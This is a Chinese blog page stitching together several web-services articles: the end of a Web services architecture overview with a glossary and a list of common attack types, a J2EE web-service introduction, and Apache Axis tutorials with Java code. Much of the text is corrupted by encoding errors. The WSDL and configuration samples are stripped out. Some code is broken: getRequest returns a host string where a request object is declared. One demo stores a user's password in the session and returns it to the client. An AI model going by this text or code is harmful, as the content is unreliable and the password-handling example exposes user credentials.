    ��理功能是要讨论的Web服务架构的最后一个方面。这些功能在WS-Management规范中有详细的说明。WS-Management构徏于该架构的若�q�组件之上，提供了所有系�l�管理解��x��案都必需的一个公共操作集。其中包括发现管理资源存在及其相互导航的能力。个别管理资源（如设�|�和动态��|��可以被检索、设�|�、创建和删除。容器和集合的内容，如大表和日志�Q�可以被枚�D。规范最后定义了事�g订阅和特定的��理操作。在�q�些斚w��Q�WS-Management只详�l�说明了最低的实现要求。规范还使符合WS-Management的实现可以部�|�到��型讑֤�。同�Ӟ��它还支持向大型数据中心和分布式安装的扩展。此外，各种机制的定义都不依赖于��M��暗示的数据模型或�pȝ��健康模型。这�U�独立性��它可以应用到各种各样的Web服务�?/P>
    WS-Management要求托管资源的引用��用带有特定附加信息的端点引用。该信息包含了对该资源提供访问的代理的URL、该资源所属资源类型的唯一标识�W�URI以及识别该资源的零个或更多个密钥。这些密钥被假设为名�U?值对。该信息是这��h��到WS-Addressing端点引用的：资源的URL映射到地址属性，资源�c�d��标识�W�映��到一个名为ResourceURI�Q�在适当的XML命名�I�间中）的特定引用属性，各密钥分别映��到一个名为Key、属性�ؓName的引用参数。�ؓ了满��管理服务的消息传递需要，规范为操作定义了3个限定符。这些限定符的SOAP表示位于header元素中。operation timeout指定了一个截止时��_��之后操作��不需要接受服务；locale元素在需要或期望转换底层信息时��用；freshness限定�W�用于请求最新的值�ƈ避免�q�回陈旧数据。对于��用WS-Transfer操作的数据访问，WS-Management指定了另�?个限定符。Get操作可用于SummaryPermitted header和NoCache header。如果可用，SummaryPermitted限定�W�允�怼�输简略表�C��Ş式。NoCache限定�W�要求传输最新数据，��止信息�~�存。对于Put和Create操作�Q�ReturnResource限定�W�要求服务返回资源的新表�C��Ş式。ReturnResource使资源受限的Web服务能够在更新资源时不保留状态�?/P>
    WS-Management��Z��仉��知定义�?个自定义的传送模式：扏V��拉和捕莗��这些模式都由URI来识别，�q�些URI在徏立订阅时使用。批传送模式��订户能够接收捆绑在一个SOAP消息中的多个事�g消息。订户可能还会要求捆�l�某一最大数目的事�g、服务收集事件可耗用的最长时��_��以及应返回数据的最大量。拉传送模式��生成服务的数据能够维护事件的逻辑队列�Q�以便订戯��够按需轮询通知。该轮询是通过使用WS-Enumeration和返回时附带订阅响应消息的枚举上下文来完成的。最后，如果UDP多�\�q�播是一�U�合适的消息传递方式，捕获传送模式便允许事�g源��用它。在捕获模式下，事�g源可以将光��知发送给某一预定义的UDP多�\�q�播地址�?/P>
�l�束�?/H1>
    本文介绍了Web服务架构的功能构造块及其底层原理。每个构造块都是依据协议规范来阐�q�的。我们希望本文所�q�的功能范围和指导原则保持不变。不�q�我们也希望架构能够得到扩展�Q�以支持更多情况。能够支持创新是该架构的基本特征�?/P>
    已经�q�行的大量细致入微的工作可以��保各种Web服务协议能够不加变动地相互组合；��管是一赯��计的�Q�它们仍可以以非常多的组合方式来使用。和功能构造块一��P��它们的��用方式与传统开发框架类伹{��必要时�Q�如对于SOAP附�g�Q�我们已�l�开发了新的解决�Ҏ��Q�而且不加变动它们��可以很好地用于该架构内。关注组合不是对丰富功能的威慑�?/P>
    该架构的SOAP消息传递基��保证�?foundation assures wide reach。SOAP消息传递以一�U�传输独立的方式支持异步和同步模式。具有更高灵�z�L��的基础架构不存在。�ؓ了加快Web服务架构的广泛采用，很多技术合作伙伴都参与了这些规范的制定。与�q�些重要技术提供程序的合作加快了设备和支持�q�些在线协议的编�E�环境的部��v。实现广泛覆盖、广泛采用和与规模无关的构造是我们�?个核心目标。我们力争确保该架构能够在�Q何��^��C��用�Q何编�E�语�a�来实现。该架构��Z��消息的和��Z��协议的特性�ؓ此提供了便利。必要时�Q�如只��用WS-Security来支持消息完整性、机密性和�w�䆾验证�Q�以及只使用WS-Policy来表�C�元数据�Ӟ��我们已经限定了用于提高互操作水��^的技术方法的使用领域。理��Z��Ԍ��只要实现切实遵守该架构的协议规范�Q�它们就能与其他��M��Web服务通信�?/P>
附录A�Q�术语表

    �z�d��h��者（Active Requestor�Q�——活动请求者是能够发出如WS-Security和WS-Trust中所�q�的Web服务消息的应用程序（可能是Web��览器）�?/P>
    �w�䆾验证�Q�Authentication�Q�——验证安全凭证的�q�程�?/P>
    授权�Q�Authorization�Q�——根据提供的安全凭证授权讉K��安全资源的过�E��?/P>
    规范化（Canonicalization�Q�——将XML文档转换成符合每一方要求的格式的过�E�。在�{�֐�文��和解译签名时使用�?/P>
    断言�Q�Claim�Q�——断�a�是对发送者、服务或其他资源�Q�如名称、��n份、密钥、组、特权、功能等�Q�所作的陈述�?/P>
    协调上下文（Coordination Context�Q�——一�l�协调服务要完成的一�l�工作的唯一标识�W��?/P>
    反序列化�Q�Deserialization�Q�——从一个八位字节流构徏XML Infoset的过�E�。它是用于从消息的有�U�格式创建消息的Infoset 表示形式的方法�?/P>
    摘要�Q�Digest�Q�——摘要是八位字节��的加密校验和�?/P>
    域（Domain�Q�——安全域代表安全��理或信�ȝ��一个单元�?/P>
    持久的两阶段提交�Q�Durable Two Phase Commit�Q�——用于文件或数据库等持久资源事务的协议�?/P>
    有效�{�略�Q�Effective Policy�Q�——有效策略，针对某一�l�定的策略主题，是附加在包含该策略主题的�{�略范围上的�{�略�l�合�?/P>
    交换模式�Q�Exchange Pattern�Q�——用于服务之间消息交换的模式�?/P>
    工厂�Q�Factory�Q�——工厂是可以从XML表示形式创徏资源的Web服务�?/P>
    联盟�Q�Federation�Q�——联盟是已经建立�怺�信�Q的信��d��的集合。信�ȝ�别可能变化，但通常都包括��n份验证，�q�可能包括授权�?/P>
    �w�䆾映射�Q�Identity Mapping�Q�——��n份映��是创徏�w�䆾属性之间关�pȝ��一�U�方法。某些��n份提供程序可能会利用�w�䆾映射�?/P>
    �w�䆾提供�E�序�Q�IP�Q�Identity Provider�Q�——��n份提供程序是为最�l�请求者提供��n份验证服务的实体。��n份提供程序还为服务提供程序提供数据源验证服务�Q�这通常是安全性��o牌服务的一�U�扩展）�?/P>
    消息�Q�Message�Q�——消息是可由服务发送或接收的完整数据单元。它是信息交换的独立单元。无��Z��时消息都会包含SOAP信封�Q��ƈ有可能包含附加MTOM中指定的MIME部�g、传输协议header�?/P>
    消息路径�Q�Message Path�Q�——遍布在初始源和最�l�接收者之间的SOAP节点集�?/P>
    被动��h��者（Passive Requestor�Q�——被动请求者是一个��用得到普遍支持的HTTP�Q�如HTTP/1.1�Q�的HTTP��览器�?/P>
    �{�略�Q�Policy�Q�——策略就是策略选项集�?/P>
    �{�略选项�Q�Policy Alternative�Q�——策略选项��是�{�略断言集�?/P>
    �{�略断言�Q�Policy Assertion�Q�——策略断�a�表示特定于域的单个要求、功能、其他属性或行�ؓ�?/P>
    �{�略表达式（Policy Expression�Q�——策略表辑ּ�是策略的XML Infoset表示形式�Q�可以是正规形式�Q�也可以是等同的压羃形式�?/P>
    ��M��Q�Principal�Q�——可以被授予安全权限或可以给出安全性或�w�䆾断言的�Q何系�l�实体�?/P>
    协议�l�合�Q�Protocol Composition�Q�——协议组合是在保持技术连贯性的同时�l�合协议�q��免�Q何非指定功能副作用的能力�?/P>
    资源�Q�Resource�Q�——资源是可由端点引用��d��的�Q何实体，在该端点引用中，该实体可以提供其自��n的XML表示形式�?/P>
    安全上下文（Security Context�Q�——安全上下文是一个抽象概念，指的是已建立的��n份验证状态和可能��h��与安全有关的附加属性的协商密钥�?/P>
    安全上下文��o牌（Security Context Token�Q�——安全上下文令牌�Q�SCT�Q�是安全上下文抽象概�늚�有线表示形式�Q�它使上下文能够被URI命名�q�和一起��用�?/P>
    安全性��o牌（Security Token�Q�——安全性��o牌用于表�C�Z��l�断�a�的集合�?/P>
    安全性��o牌服务（Security Token Service�Q�——安全性��o牌服务（STS�Q�发行安全性��o牌的Web服务。更��切地说�Q�它�Ҏ��它所信�Q的证据来作出断言�Q��ƈ发送给信�Q它的��M��一方（或特定接收者）。�ؓ了表明信任，服务需要证据（如签名）�Q�以证实安全性��o牌或安全性��o牌集提供的信息。服务本�w�可以生成��o牌，也可以通过它自��q��信�Q陈述依靠某一独立的STS发行安全性��o牌（注意�Q�对于某些安全性��o牌格式，�q�只能是重新发行或联合签名）。这构成了信��M��理的基础�?/P>
    序列化（Serialization�Q�——将XML Infoset表示为八位字节流的过�E�。它是用于创建消息的有线格式的方法�?/P>
    服务�Q�Service�Q�——通过消息来与其他实体�q�行交互的��Y件实体。注意，服务不需要连接到�|�络�?/P>
    �{�֐��Q�Signature�Q�——签名是通过加密��法计算出来�Q��ƈ�l�定到数据的一个倹{��而且�l�过�l�定�Q�数据的指定接收者可以��用该�{�֐�来验证数据没有改变�ƈ发自消息的签名者，从而提供了消息完整性和�w�䆾验证。签名的计算和验证可以通过对称或非对称密钥��法来进行�?/P>
    退出（Sign-Out�Q�——退出是�q�样一个过�E�：某主体表明它们将不再使用其��o牌且该域中的服务可能会破坏该��M��令牌�~�存�?/P>
    单点��d��Q�SSO�Q�Single Sign On�Q�——单点登录是对��n份验证序列的一�U�优化，旨在消除在请求者��n上进行的反复操作负担。�ؓ了便于进行SSO�Q�称��n份提供程序（Identity Provider�Q�的元素能够以请求者的名义充当代理�Q�将�w�䆾验证事�g的证据提供给��h��该请求者信息的�W�三斏V��这些��n份提供程序（IP�Q�是受信�ȝ��W�三方，既需要得到请求者的信�Q�Q�以�l�护��h��者的�w�䆾信息�Q�因��信息的丢失可能会泄露��h��者��n份）�Q�又需要得到Web服务的信任，Web服务可能会根据该IP提供的��n份信息的完整性提供对重要资源和信息的讉K��权�?/P>
    SOAP中介�Q�SOAP Intermediary�Q�——SOAP中介是一个SOAP处理节点�Q�它既不是原始消息发送者，也不是最�l�接收者�?/P>
    对称密钥��法�Q�Symmetric Key Algorithm�Q�——一�U�加密算法，其中的消息加密和解密都��用相同的密钥�?/P>
    �pȝ��Q�System�Q�——实现某一特定功能的服务的集合。与分布式应用程序意思相同�?/P>
    信�Q�Q�Trust�Q�——信任表�C�Z��个实体愿意依靠另一个实体来执行一�l�操作，对一�l�主题、范围作��Z��l�断�a��?/P>
    信�Q域（Trust Domain�Q�——信��d��是一个得到有效管理的安全�I�间�Q�在其中�Q�请求的来源和目标可以确定来自某一来源的特定凭证集是否�W�合该目标的相关安全�{�略�Q��ƈ�Ҏ��达成一致。目标可以将信�Q军_��延期至第三方的加入（如果�q�已被确立�ؓ一致意见的一部分�Q�，从而将受信�ȝ��W�三方包括在信�Q域中�?/P>
    易失的两阶段提交�Q�Volatile Two Phase Commit�Q�——用于缓存或�H�口��理器等易失资源事务的协议�?/P>
    Web服务�Q�Web Service�Q�——Web服务是一�U�可重复使用的��Y件组�Ӟ��它依据XML、SOAP和其他业界公认的标准通过�|�络实现交互式的消息交换�?/P>
附录B�Q�XML Infoset信息��?/H1>
    XML文��可以包含11�c�M��息项。下面，我们列出�q�详�l�说明了SOAP所支持的信息项�Q��ƈ��要介�l�了其他的信息项。SOAP支持6�c�M��息项�Q?/P>

文档�Q�Document�Q�：每个信息集里都有一个文��信息项。它用于引用所有的其他信息��V�?
元素�Q�Element:�Q�：文��中每个XML元素的信息集中都包含一个元素信息项。对所有元素的讉K��是通过对Child属性的递归跟踪提供的�?
属�?Attribute)�Q�文��中每个属性的信息集中都包含一个属性信息项。附加属性信息项用于命名�I�间�?
命名�I�间(Namespace)�Q�每个在其父元素范围内的名称�I�间信息集中都包含一个名�U�空间信息项�?
字符(Character)�Q�文档中每个数据字符的信息集中都包含一个字�W�信息项�?
注释(Comment)�Q�除了出现在DTD中的以外�Q�文��中每个注释的信息集中都包含一个注释信息项�?

    SOAP不支持但出现在XML Infoset初始定义中的5�c�M��息项是：处理指��o(Processing Instruction)、文��类型声�?Document Type Declaration)、未扩展的实体引�?Unexpanded Entity Reference)、未解析实体(Unparsed Entity)和表�C�法(Notation)�?/P>
附录C�Q�常见的安全��d��

    对分布式�pȝ��的攻��d��以分��q�个斚w��。它们可以指向系�l�中的一个或多个��L��Q�或指向它们之间的通信�|��\。攻�ȝ��目的可能是中断操作、获得机密信息或在系�l�内部执行未授权的操作。它们可能会��d��pȝ��中所使用的加密技术或以安全性�ؓ中心的其他技术，也可能企��N��过��d��下面的系�l�和�|�络层或上面的应用层来旁路它们。以下是一个简短的不全面的安全性攻�ȝ��及针�Ҏ��c�L��ȝ��标准对策的列表，它们是按上述的几个方面组�l�编排的�Q?/P>
对主机的��d��

拒绝服务�Q�DoS�Q�Denial-of-Service�Q�攻击通过��d��L��的响应能力来中断其操�?

    当指向加密层�Ӟ��DoS通常会尽力迫使主机反复执行特定��n份验证或密钥交换协议所需的计��代价高昂的公钥操作。对抗这�c�L��ȝ��典型防�M措施是�g�q�公钥操作，直到对话者的合法性能够通过��p��较少的方法（如对�U�加密或“谜语”）来验证时为止。DoS对底层网�l�层或顶层应用层的攻��d��N��Ԍ��特别是在��d��者控制着大量资源且通信量处于正帔R��信量难以觉察的情况下。要实现�|�络基础架构的部�|Ԍ��通常必须通过漏斗方式��通信量降至一个可��理水��^�?/P>

��L��机密性或授权��d��企图泄露隐私或��n�?

    �q�些��d��可能会利用主��Y件中的薄��q��来获得对��L��的控制。适当的安全性管理，如安装补丁、配�|�防火墙以及削减暴露应用�E�序的特权，是比较常用的对策。另一�c�L��d��用系�l�或应用�E�序中的��q��Q�如讄��不正��的�{�略或应用程序逻辑错误�Q�除了一般的��L��泄密以外�Q�它们还会考虑机密性或授权泄密。恰当的安全性策略管理和周密的应用程序设计是对付�q�类��d��的唯一防�M措施。在“电子欺骗”攻��M��Q�攻击者企��N��过冒用某一�l�过授权的其他方的��n份�ƈ做出相应的行为来获得对各�U�操作的授权。只要主机和�l�授权方切实保护好��n份验证密码，�q�正��用安全的�w�䆾验证协议�Q�就可以预防电子�ƺ骗�?/P>
寚w��信�|��\的攻�?/H2>

DoS对网�l�的��d��试图中断与服务的通信

    和对��L��|�络层的��d��一��P��q�些��d��实也只能��用网�l�基��架构�Ҏ��来应寏V�?/P>

对网�l�通信机密性的��d��企图在线泄露隐私

    明文通信的直接监听可以通过加密来阻止。通过��_��强大的加密算法和��_��长的密钥�Q�密码分析攻��M��可以被扼制�?/P>

对网�l�通信授权的攻��M��图泄露��n�?

    ��d��者企囑ְ�消息插入会话的“消息伪造攻几Z��和��d��者修改会话中发送的消息的消息，变更��d��都可以通过包含消息�w�䆾验证的消息安全性协议来��L��。攻击者将以前发送的�Q�因而通过了正��的�w�䆾验证�Q�消息插入会话的消息重放�Q�攻��d��以通过序号或时间戳和消息缓存的�l�合来检��和��L��?/P>

[阅读全文(115) | 回复(0) | 引用(0)]

·[WebService]J2EE构造web service     -|民工发表�?2005-6-1 21:06:03

J2EE构造web service (载至yangfanyf的专�?/FONT>)

        在这��文章，我向java�E�序开发者介�l�service-oriented architecture (SOA)�Q�我��解释怎么使用J2EE 1.4��d��立一个web 服务使其能操作和方便的通过J2EE1.4来适应应用服务�Q�例如： Oracle Application Server�Q��?/P>
Web Services Architecture
         让我们在学习web services部��vJ2EE platform之前�Q�我们先了解web service 的主要结构�?BR>         通过�|�络我们可以扑ֈ�一些关�?nbsp;web services的定义、发布、和调用。一个web service�Q�如图一

500)this.width=500" align=middle border=0 pop="点击在新�H�口查看原始囄��">

                                                                 图一

        现在有两�U�web services�Q�“RPC style and document style”，RPC-style web services是在最初受�Ƣ迎的。但在近几年是document-style是首选的web services�?BR>
       RPC-style web services是远�E�程序调用，代表�怺�交互。RPC-style web services在交互信息中调用和返回必��d��W�合明确的签名，在应用中非常不方�ѝ��相反，document-style web services 通过用xml�Q�来改变发送和接收应用�?BR>
        许多的开发者觉得web services是一个有�z�d��的技术，他��承SOA。因为它提供一个相互作用在不同的��^台和��M��的技术。例如xml�Q�soap�Q�and http�?BR>   What Are Web Services Made of?

        在web service首先要先定义A Web Services Definition Language (WSDL; pronounced "wizdle") 文��?/P>
�q�个WSDL提供一个完全的描述web service�Q�包括端口、操作、信息类型等�?/P>
Here is a simple example of a WSDL document that describes a HelloWorld web service:

name="HelloService"
targetNamespace=" xmlns:tns=" xmlns:mime=" xmlns:soap12=" xmlns:ns1=" xmlns:xsd=" xmlns:soap="

targetNamespace="   xmlns="   xmlns:soap11-enc="   xmlns:tns="   xmlns:wsdl="   xmlns:xsi="


              element="ns1:sayHelloElement"/>


              element="ns1:sayHelloResponseElement"/>















    type="tns:sayHelloResponse"/>

       transport=">

         soapAction=">











           在这个WSDL�Q�你需要注意HelloService �Q�包括他的包括端口、操作、信息类型等。这个WSDL 使web service 和客��L��Q�能够自动的产生客户端代理�?/P>
在这个web services有两个主要的技术，一个是SOAP�Q�它是调用web service�Q�一个是UDDI它提供web service的本地注册�?/P>
未完待箋

�W�笨 2005-08-17 20:40 发表评论

�W�笨 — Sun, 14 Aug 2005 01:41:00 GMT
http://www-128.ibm.com/developerworks/cn/webservices/.backup/ws-deepaxis/

一直��用J2EE从事�U�d��业务斚w��的开�?
2004 �q?2 �?
本文主要介绍使用service方式实现Web服务、复杂类型参数或者返回��g��及面向消�?文档的服务类型，同时�q�会��单提及Web服务的会话管理以及安全问题等�{��?/ABSTRACT-EXTENDED>

前段旉��我的一��文章《应用AXIS开始Web服务之旅》介�l�了如何通过AXIS�q�个��目来实现Web服务的功能。该文章主要介绍AXIS的结构、如何��用jws文�g的方式开发一个简单的Web服务�Q��ƈ用了比较大的��幅来介�l�Web服务的客��L��~�程�Q�应该说是��用AXIS开发Web服务的入门篇�Q�本文假设你已经看过《应用AXIS开始Web服务之旅》�ƈ对AXIS有一定的基础�Q�在�q�个基础上我们将要介�l�的内容有几个方面包括��用service方式实现Web服务、复杂类型参数或者返回��g��及面向消�?文档的服务类型，同时�q�会��单提及Web服务的会话管理以及安全问题等�{��?/P>
在开始我们的文章之前�Q�我们还需要搭��Z��个环境，我们需要一个支持Web服务的web应用�E�序�q�假讑֐�字�ؓaxis�Q�如何徏立请参照《应用AXIS开始Web服务之旅》文章中的介�l��?/P>
使用定制发布�~�写Web服务

使用jws文�g的方式编写Web服务��h��方便、快��L��优点�Q�它可以很快的将你已有的�c�d��布成Web服务。但是更多的时候这�q�不是一个好的主意，因�ؓ�q�种做法引发的问题是我们必须要将已有�cȝ��源码发布出来�Q�因为更多的时候我们�ƈ不想�q�样做；另外虽然你可以先用工具开发�ƈ调试完毕一个java文�g后再改名为jws�Q�但是这多少有些便扭�Q�而且�q�不是类中的所有方法你都想发布成可通过Web服务来访问的�Q�这时候你��必��d��q�些�Ҏ��的修饰符改�ؓ不是public的，�q�就跟你原有的类不同步，以后的修改将会更加的�ȝ��?/P>
在这里我把定制发布方式称为service方式�Q�就好像JSP的出��C��会��Servlet失宠的道理一��P��有了jws�Q�service方式�q�是有它的用武之圎ͼ�而且是大攑ּ�彩。发布一个service方式的Web服务需要两部分内容�Q�类文�g以及Web服务发布描述文�g。下面我们��用一个简单的例子来讲�q�这个过�E��?/P>
首先我们需要一个service�c�，�q�个�c�跟普通的�c�L��有�Q何区别，下面是我们实��C��个城市便民服务的�c�，我们需要将CityService�cȝ��两个�Ҏ��getZip和getTel发布成Web服务�Q�编译该文�g�q�把class文�g拯��?lt;webapp>/WEB-INF/classes对应目录下�?/P>

Package lius.axis.demo; /** * 该类实现了城市服务，用于发布成Web服务 * @author Liudong */ public class CityService { /** * 获取指定城市的邮�~? * @param city * @return */ public String getZip(String city) { return "510630"; } /** * 获取指定城市的长途区�? * @param city * @return */ public String getTel(String city) { return "020"; } }

�E�序已经完成�Q�下面是发布�q�个Web服务。打开/WEB-INF/server-config.wsdd如果�q�个文�g不存在则创徏一个新的文�Ӟ��内容如下�Q?/P>

其中�_�斜体的部分是我们服务的配置信息�Q�启动Tomcat�q�打开��览求访问地址�Q?http://localhost:8080/axis/services/city?wsdl �Q�下面是��览器显�C�我们Web服务的WDSL数据�?/P>

当然了，�q�个�q�程比�vjws方式来说是稍微麻烦一点，你可以把它想象成你发布一个servlet一��P��创徏servlet�cȝ��后在web.xml中加入配�|�信息�?/P>
处理复杂�c�d��参数和返回�?/SPAN>

之前我们做的演示�E�序都很��单，�Ҏ��的参数和�q�回值都是简单类型的数据�Q�但是在实际应用�q�程中往往没有�q�么��单。在使用面向对象的编�E�语�a��Ӟ��我们会希望数据类型可以是某个对象�Q�比如我们提供一个接口用来发送短信息�Q�那么我们希望接口的参数是一个消息对象，�q�个消息对象��装了一条信息的所有内容包括发送者、接收者、发送时间、优先��、信息内容等�{�，如果我们把每个内定w��做成一个参敎ͼ�那这个接口的参数可能会非常的多。因此封装成对象是很有必要的�?/P>
在��用Axis来编写Web服务时对复杂�c�d��数据的处理同样也是非常简单。Axis要求复杂�c�d��对象的编写必��ȝ��合JavaBean的规范，��单的说就是对象的属性是通过getter/setter�Ҏ��来访问的。来看看下面�q�个��单的例子所输出的WSDL信息有何�Ҏ��的地斏V��ؓ了简便，我们�q�是使用jws来编写，需要编写三个文�Ӟ��sms.jws,Message.java,Response.java�?/P>

//文�g名：sms.jws import lius.axis.demo.*; public class sms{ /** * 短信息发送Web服务接口 */ public Response send(Message msg) throws Exception{ System.out.println("CONTENT:"+msg.getContent()); Response res = new Response(); res.setMessage(msg); res.setCode(0); res.setErrorText(""); return res; } }

//Message.javapackage lius.axis.demo; /** * �Ʋ发送的信息 * @author Liudong */ public class Message { private String from; private String to; private String content; private int priority; public String getContent() { return content; } public void setContent(String content) { this.content = content; } public String getFrom() { return from; } public void setFrom(String from) { this.from = from; } public int getPriority() { return priority; } public void setPriority(int priority) { this.priority = priority; } public String getTo() { return to; } public void setTo(String to) { this.to = to; } }

//Response.javapackage lius.axis.demo; /** * 信息发送回应，在这里我们做了一个对Message �cȝ��引用 * @author Liudong */ public class Response { private int code; //发送结果代�? private String errorText; private Message message; //发送的原始信息 public int getCode() { return code; } public void setCode(int code) { this.code = code; } public String getErrorText() { return errorText; } public void setErrorText(String errorText) { this.errorText = errorText; } public Message getMessage() { return message; } public void setMessage(Message message) { this.message = message; } }

�~�译Message.java和Response.java�q�将�~�译后的�c�L��件拷贝到axis/WEB-INF/classes对应包的目录下，sms.jws拯��到axis目录�Q�访问http://localhost:8080/axis/sms.jws?wsdl卛_��看到WSDL信息�Q�这些信息与之前不同的在于下面列出的内容(注意�_�斜体部分内�?�Q?/P>

�q�里定义了两个类型Message和Response�Q�就是我们接口的参数�c�d��以及�q�回值的�c�d��。现在再使用WSDL2Java工具来生成客��L��Helper�cȝ��看Axis帮我们做了什么？它会自动帮我们生成两个类Message和Response�Q�包名与�c�d��都跟我们刚才定义的一��_��你可以打开看看跟我们刚才编写的�c�d��别多大？�q�两个类��d��了很多方法例如getTypeDesc、getSerializer、getDeserializer�{�等。现在你��可以随便写个小�E�序��试一下了�Q�我们就不在累赘了。Service方式Web服务的处理跟jws是类似的�Q�不同在于service方式需要在server-config.wsdd��d��c�d��的映��配�|�，下面�l�出一个配�|�的�C�Z��Q�读者可以根据实际情况进行修攏V�?/P>

其他�~�程语言也都可以借助语言本��n所附带的工��h��生成�q�些复杂�c�d��Q�如果你嫌麻烦的话可以��用XML来描�q�这些复杂类型，�q�样��q��单很多�?/P>
面向消息/文档的Web服务�c�d��

我们前面介绍的服务方式是��Z��RPC(�q�程�q�程调用)方式�Q�这也是Web服务最常用的方式。面向消�?文��的的�c�d��跟RPC不同的是它提供了一个更底层的抽象，要求更多的编�E�工作。客��L��可以传入��M��的XML文��Q�得到的响应不一定是SOAPEnvelope�Q�可以返回�Q何它所需要的东西�Q�甚至不�q�回。虽然这对开发者来说非常的灉|��Q�但是这�U�通讯�c�d��在实际的应用中�ƈ不常见。面向消�?文��的Web服务主要适合于下面几�U�情况，比如扚w��处理�Q�基于表单的数据导入�Q�有需要返回非XML数据�Ӟ��Web服务器实��C��要求直接讉K��传输层等�{��?/P>
对于RPC�c�d��的服务需要在全局配置文�gserver-config.wsdd中设�|�一�?lt;service ... provider="java:RPC">�Q�其中RPC��是服务的方式，而对于面向消�?文档的服务类型那java:RPC��p��替换成�ؓMessage�Q��ƈ且面向消�?文档的服务类型必��通过WSDD配置来发表。对于完成面向消息服务的�c�，其方法必��d��有以下的格式�Q?/P>

public Element[] methodName(Element [] elems)

其中methodName��Z��自定义的�Ҏ��名。在Axis的目录下可以扑ֈ�MessageService.java�Q�这��是一个完成了该类型的服务�c�，该服务的在WSDD中的配置如下�Q?/P>

不管是什么内容的Web服务�Q�对客户端来说都是一��L��Q��用WSDL2Java来生成的客户端Helper�cȝ��MessageService接口如下�Q?/P>

/** * MessageService.java * * This file was auto-generated from WSDL * by the Apache Axis WSDL2Java emitter. */ package liudong.axis.services.MessageService; public interface MessageService extends java.rmi.Remote { public java.lang.Object echoElements(java.lang.Object part) throws java.rmi.RemoteException; }

我从哪里可以获得�?/SPAN>

Axis文��中有一句话很有意思，对于�l�大多数�c�M��?我从哪里可以获得�?的问题，�{�案都在MessageContext�c�M��。通过MessageContext�c�M��可以获取下面几个内容�Q�一个AxisEngine实例的引用；��h��以及回应的信息；验证信息以及对于Servlet规范中的实例引用�{�等。例如当我们需要客��L��的IP地址时我们可以通过下面代码片段获取�Q?/P>

/** * 获取客户端请�? * @return */ private HttpServletRequest getRequest() throws Exception{ MessageContext context = MessageContext.getCurrentContext(); HttpServletRequest req = (HttpServletRequest)context.getProperty(HTTPConstants.MC_HTTP_SERVLETREQUEST); return req.getRemoteHost(); }

在类HTTPConstants中，所有以MC_开头的帔R��是你所可以获取到的信息�Q�例如上面通过MC_HTTP_SERVLETREQUEST获取对应Servlet规范中的HTTP��h��。更详细的信息可以通过查询API文��获取�?/P>
Web服务会话��理

在Web服务中我们可以借助HTTP以及HTTP Cookie来处理会话信息。前面我们介�l�了大多数对Axis的管理都是通过MessageContext实例来完成的。下面的例子首先验证用户的登录帐号与口��o如果正确则在会话中保存用��L��d��信息�Q��ƈ提供接口供客��L��获取密码�?/P>

import org.apache.axis.MessageContext; import org.apache.axis.session.Session; public class login{ public boolean login(String user, String pass){ MessageContext mc = MessageContext.getCurrentContext(); Session session = mc.getSession(); session.set("user",user); //保存用户名与口��o session.set("pass",pass); return true; } public String getPassword(String user){ MessageContext mc = MessageContext.getCurrentContext(); Session session = mc.getSession(); if(user.equals(session.get("user"))) return (String)session.get("pass"); return null; } }

对于服务器端来讲只需要通过MessageContext实例获取Session对象卛_��q�行会话�U�的数据保存或者读取，而对于通过Axis的WSDL2Java工具生成的客��L��来讲�q�需要做一个特�D�的讄��Q�请看下面客��L��代码片段�?/P>

public static void main(String[] args) throws Exception { LoginServiceLocator lsl = new LoginServiceLocator(); lsl.setMaintainSession(true); Login login = lsl.getlogin(); if(login.login("ld","haha")) System.out.println("PWD:"+login.getPassword("ld")); else System.out.println("Login failed."); }

代码中的�_�体部分��是让Axis帮助我们自动处理服务器返回的Cookie信息以保证会话正常工作�?/P>
保护Web服务

�|�络的安全问题永�q�是需要最先考虑的问题，可是怎么能让我们的Web服务更加安全呢？为此Axis��可以�Ҏ��实际的需要采取以下的几种�Ҏ��?/P>

使用HTTPS传输方式该方式需要在Web服务器上�q�行配置同时需要客��L��的支持。该措施有效的防止数据在�|�络传输�q�程中被�H�视�?
重命名Axis已有的一些名字，例如AdminService、AxisServlet�Q�删除Axis目录下一些无用的�E�序�Q�例如happyaxis.jsp以及一些无用的jar包等�?
通过讄��axis.enableListQuery的��gؓfalse来停止AxisServlet列出所有服务的功能�?
��止自动生成WSDL的功�?
使用�q��o器来增加一些验证功能，例如客户端的地址�{��?

最常用的不外乎上面几个�Q�至于更详细的资料可以参考Axis解压目录下的docs/reference.html文�g的详�l�介�l��?/P>
参考资�?

《应用AXIS开始Web服务之旅�?http://www.ibm.com/developerworks/cn/webservices/ws-startaxis/index.html

IBM开发者站点Web服务专区 http://www.ibm.com/developerworks/cn/webservices

Apache�|�站AXIS��目 http://ws.apache.org/axis/

W3C之Web服务 http://www.w3.org/2002/ws/

关于作�?/SPAN>
刘冬�Q�一直��用J2EE从事�U�d��业务斚w��的开发。现在可以通过Java自由人网站来跟我联系�Q�网址是： http://www.javayou.com�Q�另外我的邮件地址�?winter.lau@163.com�?

�W�笨 2005-08-14 09:41 发表评论

Hello, Axis

�W�笨 — Sun, 14 Aug 2005 01:20:00 GMT

http://www.javaresearch.org/article/showarticle.jsp?column=5&thread=28482

Axis是Apache的一个开源web service引擎。它目前最为成熟的开源web service引擎之一。下面我主要介绍一下如何��用该Axis开发您的web service 服务�?BR>

1.安装

以tomcat4.1为服务器�Q�下面说明如何安装axis�Q?BR>   1.解压下蝲后的包，��包中axis目录复制到tomcat目录下的webapps目录下；
   2.��axis/WEB-INF/lib目录下类文�g复制到tomcat目录下的common/lib目录下；
   3.重新启动tomcat�Q?BR>   4.讉K��http://localhost:8080/axis/happyaxis.jsp,如果能访问，表示安装成功�Q?/P>

2.开发webservice服务

a.�~�写普通类文�g�Q�如下所�C�：
//文�g名：Test.java
import java.util.*;

public class Test{
    //fields
    private    String name="gaga";
    private int age=20;
    private List items=new ArrayList();


    //method at here.
    public String getName(){
        return name;
    }

    public int getAge(){
        return age;
    }

    public List getItems(){
        return items;
    }
}
��本文�g(Test.java)复制到Axis目录下，�q�将其更名�ؓTest.jws�Q?BR>b.讉K��http://localhost:8080/axis/Test.jws,Axis��׃��~�译该文�Ӟ��q�将光��|�到�pȝ��中；
下面你就可以开发web service的客��L��E�序了；

3.开发客��L��E�序

下面是客��L��E�序�Q?BR>import org.apache.axis.client.*;
import org.apache.axis.client.Call;
import org.apache.axis.client.Service;

import javax.xml.namespace.QName;

public class TestWebService{

    public static void main(String args[]){

        System.out.println("Start invoking....");

         try {
             String endpoint =
                      "http://localhost:8080/axis/Test.jws";//你写的那个文�?BR>
             Service  service = new Service();
             Call     call    = (Call) service.createCall();

             call.setTargetEndpointAddress( new java.net.URL(endpoint) );
